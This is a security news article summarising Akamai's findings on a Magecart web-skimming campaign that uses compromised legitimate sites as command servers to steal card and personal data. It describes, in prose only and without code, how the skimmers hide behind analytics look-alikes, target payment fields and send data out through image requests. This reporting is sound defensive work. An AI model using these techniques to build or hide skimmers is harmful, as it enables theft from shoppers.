Magecart campaign abuses legitimate sites to host web skimmers and act as C2

A new ongoing Magecart web skimmer campaign abuse legitimate websites to act as makeshift command and control (C2) servers.

Akamai researchers discovered a new ongoing Magecart web skimmer campaign aimed at stealing personally identifiable information (PII) and credit card information from users in North America, Latin America, and Europe.

Magecart attacks target e-commerce websites, the name “Magecart” is derived from the malicious code (JavaScript) typically injected by the attackers into compromised websites.

In the recent campaign uncovered by Akamai, threat actors hijack legitimate websites to act as makeshift C2 servers and use them to distribute malware.

“Attackers employ a number of evasion techniques during the campaign, including obfuscating Base64 and masking the attack to resemble popular third-party services, such as Google Analytics or Google Tag Manager.” reads the analysis published by Akamai.

Some of the victim organizations have hundreds of thousands of visitors per month, this implies that their compromise impacted up to tens of thousands of victims. The researchers pointed out that many victims uncovered the attack more than a month after the initial compromise.

The attack chain commences by scanning the web for vulnerable legitimate sites and hacking them to inject malicious code. Attackers used the compromised websites as C2 servers to avoid detection.

“Rather than using the attackers’ own C2 server to host malicious code, which may be flagged as a malicious domain, attackers hack into (using vulnerabilities or any other means at their disposal) a vulnerable, legitimate site, such as a small or medium-sized retail website, and stash their code within it.” continues the analysis. “In this way, the attackers create a seemingly healthy host for their malicious code, and can deliver it to any victim they choose.”

Attackers employ small JavaScript code snippets that act as loaders to fetch the final software skimmer from the victims’ websites previously compromised.

Threat actors likely compromised the websites by exploiting known vulnerabilities in popular CMS (such as Magento, WooCommerce, WordPress, Shopify, etc.) or in vulnerable third-party services and components used by the website.

The researchers identified two distinct variations of the skimmer code employed in this ongoing campaign. 

The first skimmer code is a heavily obfuscated version that contains a list of CSS selectors which explicitly indicated that the skimmer targeted input fields responsible for capturing PII and credit card details.

The second variation of the skimmer was comparatively less obscured, enabling Akamai researchers to gauge the scope of this campaign by analyzing the indicators present in the code.

Once stolen the data, attackers exfiltrate them through a straightforward HTTP request that is initiated by creating an IMG tag within the software skimmer. The stolen data is then appended to the request as query parameters, encoded as a Base64 string.

“The primary solution for effectively combating web skimming lies in the utilization of tools and technologies that provide behavioral and anomaly detection” concludes the report. “Traditional static analysis tools prove inadequate in countering web skimmers, as they continually modify their methods and employ increasingly sophisticated techniques that can evade static analysis.”

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Magecart)